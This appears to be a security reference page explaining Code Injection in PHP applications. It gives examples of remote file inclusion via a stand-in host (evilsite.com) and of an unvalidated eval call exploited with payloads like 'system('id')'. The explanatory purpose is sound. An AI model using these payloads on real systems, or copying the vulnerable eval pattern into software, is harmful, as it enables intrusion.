Code Injection

ASDR Table of Contents

Description
Code Injection is the general name for a lot of types of attacks, which depends on inserting of the code, which will be interprated by the application. Such an attack maybe be performed e.g. by adding string of characters into cookie or argument values in the URI. This attack make use of lack of accurate input/output data validation i.e.:

- class of allowed charachters (standard regular expressions classes or custom)

- data format

- amount of expected data

- for numerical input its values

The difference between Code Injection and Command Injection are measures used to achive simmilar goals. The concept of Code Injection is to add malicious code into application, which then will be executed. Added code is a part of the application itself. It's not an external code, which is executed like it would be in Command Injection.

Examples
Example 1

If site uses include fucntion, which operates on variables sent with GET method, and there is no validation on them performed, then the attacker may try to execute different code than author of the code had on mind.

The URL below should display information about how to contact with the testsite company.

http://testsite.com/index.php?page=contact.php

Below the altered code will include another code from http://evilsite.com/evilcode.php. The script "evilcode.php" may contain e.g. phpinfo function, which is usefull for gaining information about configuration of the environment in which the web service runs.

http://testsite.com/?page=http://evilsite.com/evilcode.php

One condition must be satisfied for this example to be successful, namely the web server configuration must allow for including files in the "http://" notation.

Example 2

When programmer uses eval function and operates on data inside it, and these data may be altered by the attacker, then it's only one step closer to Code Injection.

Mentioned below example shows how to use the eval function:

$myvar = "varname"; $x = $_GET['arg']; eval("\$myvar = \$x;");

The code above which smells like a rose may be used to perform a Code Injection attack.

E.g. passing in the URI /index.php?arg=1; phpinfo

Exploiting bugs like these the attacker doesn't have to limit himself only to Code Injection attack. The attacker may tempt himself to use Command Injection technique e.g.

/index.pho?arg=1; system('id')

Related Threats

 * Category:Command Execution

Related Attacks

 * Command Injection
 * SQL Injection
 * LDAP Injection
 * SSI Injection
 * XSS

Related Vulnerabilities

 * Category: Input Validation Vulnerability

Related Countermeasures

 * validation of the format / expected classes of charachetrs / input/output data size